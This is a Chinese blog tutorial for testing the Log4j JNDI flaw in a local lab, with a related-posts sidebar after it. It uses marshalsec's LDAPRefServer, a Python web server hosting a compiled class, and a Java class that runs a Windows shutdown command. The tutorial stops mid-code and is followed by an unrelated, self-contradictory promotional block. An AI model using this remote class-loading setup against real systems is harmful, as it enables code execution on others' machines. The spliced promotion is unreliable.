Log4j 漏洞测试

于 2024-05-13 06:19:02 发布
阅读量1k 收藏 11
点赞数 16
分类专栏: 程序员 文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84097678/article/details/138780722
版权

介绍在windows下进行 Log4j 漏洞测试,linux上步骤也都一样。

1、参照项目,项目地址: https://github.com/mbechler/marshalsec

克隆代码到本地,mvn clean package -DskipTests打包,target 目录下会生成marshalsec-0.0.3-SNAPSHOT-all.jar

2、新建一个普通的 java 类,等会将此类注入到待测试的项目中。可以随便写逻辑 (生成文件、定时关机等)

示例: 功能是在windows系统下,3600秒后关机

import java.io.File;

import java.io.IOException;

/**

  • @author rxf113

*/

public class InjectClass {

public InjectClass() {

try {

Runtime.getRuntime().exec(new String[]{“cmd.exe”, “/c”, “Shutdown.exe -s -t 3600”});

// new File(System.getProperty(“user.dir”) + “\” + System.currentTimeMillis() + “.txt”).createNewFile();

} catch (IOException e) {

e.printStackTrace();

}

}

public static void main(String[] args) {

new InjectClass();

}

}

3、对上面的类执行 javac 编译,然后启动一个http 服务器,能通过服务器访问到编译后的 class 文件

示例: 使用python,我编译后的class文件在F:\log4j2-test\src\main\java目录下。在 cmd窗口运行以下命令

python -m http.server 9011 -d F:\log4j2-test\src\main\java

如果成功,浏览器访问 http://127.0.0.1:9011/InjectClass.class 就能下载到class文件。

4、新打开一个 cmd 窗口启动第一步打包好的jar包。

参照命令:

java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.(LDAP|RMI)RefServer # []

示例: 启动 LDAPSERVER

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer “http://127.0.0.1:9011/#InjectClass”

启动成功后: 控制台会输出监听的端口为:1389

所需的步骤全部做完了,接下来开始测试

1、运行本地待测试的项目。使用 log4j 打印日志

import org.apache.logging.log4j.LogManager;

import org.apache.logging.log4j.Logger;

/**

  • @author rxf113

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数初中级Android工程师,想要提升技能,往往是自己摸索成长,自己不成体系的自学效果低效漫长且无助。

因此收集整理了一份《2024年Web前端开发全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Android开发知识点!不论你是刚入门Android开发的新手,还是希望在技术上不断提升的资深开发者,这些资料都将为你打开新的学习之门!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
你打开新的学习之门!**

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84097678
关注
  • 16
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
com.google.android.webview
02-27
android system webview 适配系统>=5.0
盘点:Log4j 漏洞带来的深远影响
mxy2404830的博客
12-23 3412
上周,Log4j 漏洞颠覆了互联网,影响是巨大。攻击者也已经开始利用该漏,到目前为止,Uptycs 研究人员已经观察到与 coinminers、DDOS 恶意软件和一些勒索软件变种相关的攻击,这些攻击积极利用了此漏洞。 未来几天勒索软件攻击的规模可能会增加。由于该漏洞非常严重,因此可能还会发现一些可以绕过当前补丁级别或修复程序的变体。因针对这种攻击持续监控和强化系统是极其重要的。 Uptycs 此前在博客中为其客户分享了有关补救和检测步骤的详细信息 。并讨论了攻击者利用 Log4j 漏洞的各种恶意软件类
async 函数——JS中的异步处理方式
诸葛韩信--一个前往前端不归路的浪子
04-11 1万+
async 函数的语法 async function name([param[, param[, ... param]]]) { statements } name: 函数名称。 param: 要传递给函数的参数的名称。 statements: 函数体语句。 async 函数的书写方式如下: // 函数声明 async function foo() {} // 函数表达式 const foo = async function () {}; // 对象的方法 let obj = { async foo(
理解async和await
awn80645的博客
01-14 716
async 是“异步”的简写,而 await 可以认为是 async wait 的简写。 所以应该很好理解 async 用于申明一个 function 是异步的,而 await 用于等待一个异步方法执行完成。 async 函数是什么?一句话,它就是 Generator 函数的语法糖。async函数就是将 Generator 函数的星号(*)替换成async,将yield替换成a...
js async
蜗牛在奔跑的博客
02-22 5010
JS中的async/await的用法和理解 1、首先需要理解async 和 await的基本含义 async 是一个修饰符,async 定义的函数会默认的返回一个Promise对象resolve的值,因此对async函数可以直接进行then操作,返回的值即为then方法的传入函数 复制代码 // 0. async基础用法测试 async function fun0() { console.log(1) return 1 } fun0().then( x => { con.
Javascript——async、await详解
weixin_43551242的博客
01-15 6674
async、await
log4j2漏洞检测工具
05-07
**Log4j2漏洞检测工具详解** 在当前的IT环境中,安全问题日益凸显,特别是针对开源组件的安全漏洞Log4j2,一个广泛使用的Java日志框架,最近曝出的重大安全漏洞(CVE-2021-44228,被称为Log4Shell)引起了全球的...
log4j远程执行漏洞测试源码
12-22
通常,这样的资源会包含一个可运行的示例,展示如何利用Log4j漏洞,或者帮助开发者检测其应用中的漏洞。 **Log4j远程执行漏洞详解** Log4j是Apache的一个开源日志框架,广泛用于Java应用程序,用于记录应用程序...
log4j漏洞排查小工具
12-20
3. **漏洞模拟测试**:通过发送特定的测试请求,模拟攻击行为,验证系统是否易受Log4j漏洞影响。 4. **修复建议**:提供针对检测到的漏洞的修复步骤,如更新Log4j到安全版本,或者提供临时禁用漏洞利用的方法。 5....
log4j2.17.2
04-14
log4j2.17.2漏洞修复程序包详解》 在信息技术领域,日志管理是系统维护和故障排查的重要环节。Log4j作为Java平台广泛使用的日志记录框架,其性能高效、功能强大,深受开发者的青睐。然而,随着技术的发展,安全...
apachelog4J漏洞测试工具,apacheLog4j_POC
08-23
仅供测试学习使用,请不要从事非法活动
JavaScript中的await
qq_58511059的博客
03-29 7319
async 函数是使用async关键字声明的函数。async 函数是 AsyncFunction 构造函数的实例,并且其中允许使用 await 关键字。async 和 await 关键字让我们可以用一种更简洁的方式写出基于 Promise 的异步行为,而无需刻意地链式调用 promise。async 函数可能包含 0 个或者多个 await 表达式。await 表达式会暂停整个 async 函数的执行进程并出让其控制权,只有当其等待的基于 promise 的异步操作被兑现或被拒绝之后才会恢复进程。
Android WebView详解
zdj_Develop的博客
04-16 7553
本文详细介绍了WebView
【Android】WebView控件最全使用解析
lucashu的博客
08-20 8724
本文目录WebView 概述WebView基础篇- 基本用法添加权限和布局加载远程网页加载本地网页加载HTML片段WebView 常用方法清除缓存WebView 中网页的前进 / 后退本地网页跳转解决跳转用默认浏览器打开的问题WebView 进阶篇-常用子类WebSettings类WebViewClient类常见方法使用案例WebChromeClient类常用方法使用案例测试网页 WebView ...
使用Idea导入eclipse的javaweb项目(超详细)
热门推荐
博客首页
03-30 1万+
IDEA 导入eclipse 的Javaweb项目 B站视频步骤 1.首先选择打开该项目 2.打开后会是这样的,只显示.classpath和.project的eclipse文件 3.打开project structre 4.在project structre中点击modules,然后点击+号,选import module,选择该文件夹的位置 5.选择eclipse,点击next 6.选择keep project and module files in,然后继续点击next 7.选中项目名,点击
Android 之 WebView (网页视图)基本用法
leyang0910的博客
07-08 7110
答:Android内置webkit内核的高性能浏览器,而WebView则是在这个基础上进行封装后的一个 控件,WebView直译网页视图,我们可以简单的看作一个可以嵌套到界面上的一个浏览器控件!
javascript中async/await详解
abxxcd的博客
08-25 3363
async,await async是Generator的语法糖,异步编程的终极解决方案,彻底解决回调地狱的问题 async用来声明一个function是异步的,而await用来等待一个异步函数的执行 注意: await只能出现在async函数里面 async async function asyncfunc() { return '奥里给' } const result = asyncfunc() console.log(result) // Promise result.then((val)=&g
【JS技巧】使用顶层 await 简化 JS 代码
小钿钿不忘初心的博客
03-29 5566
前言 JavaScript 是一种流行的编程语言,最初被设计为单线程和同步的语言,意味着程序需要在不等待获取外部资源或者耗时的计算的情况下一步一步的运行。如果脚本需要这样的资源或计算,这种同步行为将导致错误。这会阻塞队列中的所有其他进程运行,无论它们是否依赖于那些阻塞中的任务。 但很久以前,JavaScript 引入了一个机制让其可以在等待外部资源或者耗时任务的时候去执行其剩余的代码。这种异步行为是通过在函数上使用回调或 promise 来实现的。 什么是回调和promise 我将通过代码来解释这些概念。如
Bootstrap 按钮(实例 )
最新发布
2401_84093443的博客
05-04 777
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数初中级Android工程师,想要提升技能,往往是自己摸索成长,自己不成体系的自学效果低效漫长且无助。因此收集整理了一份《2024年Web前端开发全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Android开发知识点!
log4j漏洞测试步骤
08-05
log4j漏洞测试是为了检测和验证系统中是否存在log4j漏洞,以下是一种常见的log4j漏洞测试步骤: 1. 查看系统中是否使用了log4j:首先,我们需要确认系统是否使用了log4j作为日志记录框架。可以查看系统代码或者依赖...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值